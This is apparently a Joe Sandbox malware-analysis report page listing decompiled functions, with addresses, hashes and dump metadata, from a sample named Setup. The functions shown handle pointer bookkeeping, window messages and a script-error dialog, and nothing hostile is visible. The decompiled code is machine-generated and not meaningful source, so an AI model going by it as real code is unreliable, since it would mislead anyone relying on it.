                                                                                                                                                              Function 0041E590 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0041E590(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _t21;

				_push(__ecx);
				_v8 = __ecx;
				E0041EA20(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
				_t21 = E00433720(_v8);
				 *_t21 =  *((intOrPtr*)(_v8 + 4));
				return _t21;
			}





                                                                                                                                                              0x0041e593
                                                                                                                                                              0x0041e594
                                                                                                                                                              0x0041e5a5
                                                                                                                                                              0x0041e5b8
                                                                                                                                                              0x0041e5bd
                                                                                                                                                              0x0041e5d2
                                                                                                                                                              0x0041e5d7
                                                                                                                                                              0x0041e5e2
                                                                                                                                                              0x0041e5e7

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 2178110c97017f37eb87d8c9e6f3738af049dcf08290f1205e57e1a0d3705f4f
                                                                                                                                                              • Instruction ID: affb03b290b1aa2b73d149a340fe72a2a10df3c9f816c2c17cb8d834609de070
                                                                                                                                                              • Opcode Fuzzy Hash: 2178110c97017f37eb87d8c9e6f3738af049dcf08290f1205e57e1a0d3705f4f
                                                                                                                                                              • Instruction Fuzzy Hash: AAF04C74A00108EFC708DF95D69299DB7F6EF89304B2181EDD4095B365DB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00421880 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00421880(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _t21;

				_push(__ecx);
				_v8 = __ecx;
				E00421DA0(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
				_t21 = E00433720(_v8);
				 *_t21 =  *((intOrPtr*)(_v8 + 4));
				return _t21;
			}





                                                                                                                                                              0x00421883
                                                                                                                                                              0x00421884
                                                                                                                                                              0x00421895
                                                                                                                                                              0x004218a8
                                                                                                                                                              0x004218ad
                                                                                                                                                              0x004218c2
                                                                                                                                                              0x004218c7
                                                                                                                                                              0x004218d2
                                                                                                                                                              0x004218d7

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 77c2a6123a5c4162045a07c778d73c785a649a9c5d2f507694f46f5a09e040ea
                                                                                                                                                              • Instruction ID: 20c62e239c44e157093105c07a3df5977072132efcbc44a26de87df081af60f6
                                                                                                                                                              • Opcode Fuzzy Hash: 77c2a6123a5c4162045a07c778d73c785a649a9c5d2f507694f46f5a09e040ea
                                                                                                                                                              • Instruction Fuzzy Hash: E9F09774A00108EFCB08DF85D69299EB7F6EF89308B2081EDE4095B361CB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00427A00 Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00427A00(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _t21;

				_push(__ecx);
				_v8 = __ecx;
				E00427A90(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
				_t21 = E00433720(_v8);
				 *_t21 =  *((intOrPtr*)(_v8 + 4));
				return _t21;
			}





                                                                                                                                                              0x00427a03
                                                                                                                                                              0x00427a04
                                                                                                                                                              0x00427a15
                                                                                                                                                              0x00427a28
                                                                                                                                                              0x00427a2d
                                                                                                                                                              0x00427a42
                                                                                                                                                              0x00427a47
                                                                                                                                                              0x00427a52
                                                                                                                                                              0x00427a57

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 058c4132b1a2911cdff3fd2950bd61988e7a0331b9e35a95fdb7eae25e5ade2c
                                                                                                                                                              • Instruction ID: d27608f839234f1b45ce34bf94b10c3913806d25348b452ac4f55446c31f5687
                                                                                                                                                              • Opcode Fuzzy Hash: 058c4132b1a2911cdff3fd2950bd61988e7a0331b9e35a95fdb7eae25e5ade2c
                                                                                                                                                              • Instruction Fuzzy Hash: 88F09774A00108EFCB08DF85D69299EB7F6EF89308B2081EDE4095B361CB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0043BB40 Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0043BB40(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _t21;

				_push(__ecx);
				_v8 = __ecx;
				E0043BDD0(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
				_t21 = E00433720(_v8);
				 *_t21 =  *((intOrPtr*)(_v8 + 4));
				return _t21;
			}





                                                                                                                                                              0x0043bb43
                                                                                                                                                              0x0043bb44
                                                                                                                                                              0x0043bb55
                                                                                                                                                              0x0043bb68
                                                                                                                                                              0x0043bb6d
                                                                                                                                                              0x0043bb82
                                                                                                                                                              0x0043bb87
                                                                                                                                                              0x0043bb92
                                                                                                                                                              0x0043bb97

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: d61e40b3ab140962dc54a35959aec621d71b70ce22b9f05a6b6e4c174653fd73
                                                                                                                                                              • Instruction ID: bede86a7c527bf71af5b54a7d38cf01d07793778824e641ca2ebc1a4e5ffed0c
                                                                                                                                                              • Opcode Fuzzy Hash: d61e40b3ab140962dc54a35959aec621d71b70ce22b9f05a6b6e4c174653fd73
                                                                                                                                                              • Instruction Fuzzy Hash: 04F03474A00108EFCB08DF95D69299EB7B6EF89308F2181ADE4095B365DB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041FDB0 Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0041FDB0(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _t21;

				_push(__ecx);
				_v8 = __ecx;
				E00420210(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
				_t21 = E00433720(_v8);
				 *_t21 =  *((intOrPtr*)(_v8 + 4));
				return _t21;
			}





                                                                                                                                                              0x0041fdb3
                                                                                                                                                              0x0041fdb4
                                                                                                                                                              0x0041fdc5
                                                                                                                                                              0x0041fdd8
                                                                                                                                                              0x0041fddd
                                                                                                                                                              0x0041fdf2
                                                                                                                                                              0x0041fdf7
                                                                                                                                                              0x0041fe02
                                                                                                                                                              0x0041fe07

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: b09d8c182e7baa18f3921ea0d51b61e6a8fe6aa702b685056a05800423826f4c
                                                                                                                                                              • Instruction ID: fbd9ff186e58c51dc107a68727a9d9793a67c5f80205da66d1e4463b3b109a50
                                                                                                                                                              • Opcode Fuzzy Hash: b09d8c182e7baa18f3921ea0d51b61e6a8fe6aa702b685056a05800423826f4c
                                                                                                                                                              • Instruction Fuzzy Hash: 2EF07974A00108EFC708DF85D69295DB7F5AF89304B2081EDD4095B361CB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00408EF0 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00408EF0(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _t21;

				_push(__ecx);
				_v8 = __ecx;
				E00409120(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
				_t21 = E00433720(_v8);
				 *_t21 =  *((intOrPtr*)(_v8 + 4));
				return _t21;
			}





                                                                                                                                                              0x00408ef3
                                                                                                                                                              0x00408ef4
                                                                                                                                                              0x00408f05
                                                                                                                                                              0x00408f18
                                                                                                                                                              0x00408f1d
                                                                                                                                                              0x00408f32
                                                                                                                                                              0x00408f37
                                                                                                                                                              0x00408f42
                                                                                                                                                              0x00408f47

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 440d436155544bdce126e099541bc9f9b1c1a964b5ec4327e277697f2254fd46
                                                                                                                                                              • Instruction ID: eb08f18632993118ca8a3c89ccbe7ac1e294b481177aceddd8f570f870356ca5
                                                                                                                                                              • Opcode Fuzzy Hash: 440d436155544bdce126e099541bc9f9b1c1a964b5ec4327e277697f2254fd46
                                                                                                                                                              • Instruction Fuzzy Hash: C7F04C74A00108EFCB08DF95D69295DB7F5EF89304B2181EDD4095B365DB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040C210 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040C210(struct HWND__* __ecx, signed int _a4, signed int _a8, long _a12, intOrPtr* _a16) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				char _v20;
				char _v24;
				char _v28;
				struct HWND__* _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;

				_v32 = __ecx;
				_v8 = 0;
				_v36 = _a4;
				if(_v36 > 0x39) {
					if(_v36 > 0x115) {
						if(_v36 < 0x132) {
							L35:
							if(_v8 != 0) {
								if(( *(_v32 + 0x98) >> 0x00000003 & 0x00000001) == 0) {
									return SendMessageW(_v8, _a4 + 0x2000, _a8, _a12);
								}
								_v20 = 0;
								if(( *(_v32 + 0x98) & 0x00000001) != 0 && E0041D530(_v32 + 0x74) != 0) {
									_v44 = E0041D530(_v32 + 0x74);
									 *((intOrPtr*)( *((intOrPtr*)( *_v44 + 0x24))))(_v44, _a4 + 0x2000, _a8, _a12,  &_v20);
								}
								return _v20;
							}
							 *_a16 = 0;
							return 1;
						}
						if(_v36 <= 0x138) {
							_v8 = _a12;
							goto L35;
						}
						if(_v36 == 0x210) {
							E0040C190(_v32);
							_v40 = _a8 & 0xffff;
							if(_v40 <= 0) {
								L21:
								_v8 = E0041D530(E0040C1E0(_v32 + 4,  &_v24, _a8 >> 0x00000010 & 0xffff));
								L22:
								goto L35;
							}
							if(_v40 <= 2) {
								_v8 = _a12;
								goto L22;
							}
							goto L21;
						}
						goto L35;
					}
					if(_v36 >= 0x114) {
						L33:
						_v8 = _a12;
					} else {
						if(_v36 == 0x4e) {
							_v8 =  *_a12;
						} else {
							if(_v36 == 0x111) {
								if(_a12 != 0) {
									_v8 = _a12;
								}
							}
						}
					}
					goto L35;
				}
				if(_v36 == 0x39) {
					_v8 =  *((intOrPtr*)(_a12 + 8));
					goto L35;
				}
				_v36 = _v36 - 0x2b;
				if(_v36 > 4) {
					goto L35;
				}
				switch( *((intOrPtr*)(_v36 * 4 +  &M0040C44C))) {
					case 0:
						__eax = _a12;
						_v12 = _a12;
						__ecx = _v12;
						if(__ecx->i == 1) {
							__ecx = _v12;
							__edx =  *(__ecx + 0x14);
							if(IsWindow( *(__ecx + 0x14)) != 0) {
								__eax = _v12;
								__ecx =  *(_v12 + 0x14);
								_v8 = __ecx;
							}
						} else {
							__edx = _v12;
							__eax =  *(__edx + 0x14);
							_v8 =  *(__edx + 0x14);
						}
						goto L35;
					case 1:
						__edx = _a12;
						_v16 = _a12;
						__eax = _v16;
						if( *_v16 != 1) {
							__ecx = _v16;
							__edx =  *(_v16 + 4);
							__eax =  &_v28;
							__ecx = _v32;
							__ecx = _v32 + 4;
							__ecx = E0040C1E0(_v32 + 4,  &_v28,  *(_v16 + 4));
							_v8 = E0041D530(__ecx);
						}
						goto L35;
					case 2:
						__eax = _a12;
						__ecx =  *(_a12 + 0xc);
						_v8 = __ecx;
						goto L35;
					case 3:
						goto L33;
				}
			}













                                                                                                                                                              0x0040c216
                                                                                                                                                              0x0040c219
                                                                                                                                                              0x0040c223
                                                                                                                                                              0x0040c22a
                                                                                                                                                              0x0040c25a
                                                                                                                                                              0x0040c284
                                                                                                                                                              0x0040c3a5
                                                                                                                                                              0x0040c3a9
                                                                                                                                                              0x0040c3cd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c43f
                                                                                                                                                              0x0040c3cf
                                                                                                                                                              0x0040c3e2
                                                                                                                                                              0x0040c3fe
                                                                                                                                                              0x0040c422
                                                                                                                                                              0x0040c422
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c424
                                                                                                                                                              0x0040c3ae
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c3b4
                                                                                                                                                              0x0040c291
                                                                                                                                                              0x0040c3a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c3a2
                                                                                                                                                              0x0040c29e
                                                                                                                                                              0x0040c2c6
                                                                                                                                                              0x0040c2d6
                                                                                                                                                              0x0040c2dd
                                                                                                                                                              0x0040c2ef
                                                                                                                                                              0x0040c314
                                                                                                                                                              0x0040c317
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c317
                                                                                                                                                              0x0040c2e3
                                                                                                                                                              0x0040c2ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c2ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c2e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c2a0
                                                                                                                                                              0x0040c263
                                                                                                                                                              0x0040c397
                                                                                                                                                              0x0040c39a
                                                                                                                                                              0x0040c269
                                                                                                                                                              0x0040c26d
                                                                                                                                                              0x0040c2bb
                                                                                                                                                              0x0040c26f
                                                                                                                                                              0x0040c276
                                                                                                                                                              0x0040c2a9
                                                                                                                                                              0x0040c2ae
                                                                                                                                                              0x0040c2ae
                                                                                                                                                              0x0040c2b1
                                                                                                                                                              0x0040c276
                                                                                                                                                              0x0040c26d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c263
                                                                                                                                                              0x0040c230
                                                                                                                                                              0x0040c387
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c387
                                                                                                                                                              0x0040c23c
                                                                                                                                                              0x0040c243
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c24c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c31c
                                                                                                                                                              0x0040c31f
                                                                                                                                                              0x0040c322
                                                                                                                                                              0x0040c328
                                                                                                                                                              0x0040c335
                                                                                                                                                              0x0040c338
                                                                                                                                                              0x0040c344
                                                                                                                                                              0x0040c346
                                                                                                                                                              0x0040c349
                                                                                                                                                              0x0040c34c
                                                                                                                                                              0x0040c34c
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c32d
                                                                                                                                                              0x0040c330
                                                                                                                                                              0x0040c330
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c351
                                                                                                                                                              0x0040c354
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c35d
                                                                                                                                                              0x0040c35f
                                                                                                                                                              0x0040c362
                                                                                                                                                              0x0040c366
                                                                                                                                                              0x0040c36a
                                                                                                                                                              0x0040c36d
                                                                                                                                                              0x0040c375
                                                                                                                                                              0x0040c37c
                                                                                                                                                              0x0040c37c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c38c
                                                                                                                                                              0x0040c38f
                                                                                                                                                              0x0040c392
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageW.USER32(00000000,?,?,?), ref: 0040C43F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID: N
                                                                                                                                                              • API String ID: 3850602802-1130791706
                                                                                                                                                              • Opcode ID: 7f2c5bcd31de584d4d0be3587bf2bf2be01db85bb1ee8956a34027b5554130ec
                                                                                                                                                              • Instruction ID: a8dd4be5facf2ee9d7f11e99f2b5bce13c937c67a52612d1dba8838cde38d3c2
                                                                                                                                                              • Opcode Fuzzy Hash: 7f2c5bcd31de584d4d0be3587bf2bf2be01db85bb1ee8956a34027b5554130ec
                                                                                                                                                              • Instruction Fuzzy Hash: 1471D9B4910209DFDF18DF98C994AEEB7B1BF48304F24826EE811B7381D7389951DB69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F72A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004F72A0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				struct HWND__* _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v52;
				signed int _v53;
				char _v54;
				char _v84;
				struct HWND__* _v88;
				struct HWND__* _v92;
				struct HWND__* _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _t38;
				signed int _t39;
				signed int _t44;
				struct HWND__* _t46;
				signed int _t48;
				intOrPtr _t61;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t83;

				_t82 = __esi;
				_t81 = __edi;
				_t78 = __edx;
				_t61 = __ebx;
				_push(0xffffffff);
				_push(0x5106dc);
				_push( *[fs:0x0]);
				_t38 =  *0x561244; // 0xddd124f9
				_t39 = _t38 ^ _t83;
				_v20 = _t39;
				_push(_t39);
				 *[fs:0x0] =  &_v16;
				if(_a4 != 0) {
					E004175C0(E00434050( &_v54));
					_v8 = 0;
					_t44 = E004F6FA0(__eflags, _a4,  &_v52);
					__eflags = _t44;
					if(_t44 != 0) {
						_v92 = 1;
						_v8 = 0xffffffff;
						E004176E0();
						_t46 = _v92;
					} else {
						_t48 = E004C5660(0x54, 0);
						asm("sbb eax, eax");
						_v53 =  ~( ~_t48);
						__eflags = _v53 & 0x000000ff;
						if((_v53 & 0x000000ff) != 0) {
							MessageBoxW(0, E00416A30( &_v48), L"JSError", 0x30);
						}
						__eflags =  &_v52;
						if( &_v52 == 0) {
							_v96 = 0;
						} else {
							_v96 =  &_v52 + 4;
						}
						_v100 = E00409760( &_v84, L"JSError: ", _v96);
						_v104 = _v100;
						_v8 = 1;
						_t78 = _v104;
						E00409880( &_v52, __eflags, _v104);
						_v8 = 0;
						E004178C0( &_v84);
						E004162C0(0xc0b50001, E00416A30( &_v48));
						_v88 = 0;
						_v8 = 0xffffffff;
						E004176E0();
						_t46 = _v88;
					}
				} else {
					_t46 = 0x80070057;
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t46, _t61, _v20 ^ _t83, _t78, _t81, _t82);
			}

























                                                                                                                                                              0x004f72a0
                                                                                                                                                              0x004f72a0
                                                                                                                                                              0x004f72a0
                                                                                                                                                              0x004f72a0
                                                                                                                                                              0x004f72a3
                                                                                                                                                              0x004f72a5
                                                                                                                                                              0x004f72b0
                                                                                                                                                              0x004f72b4
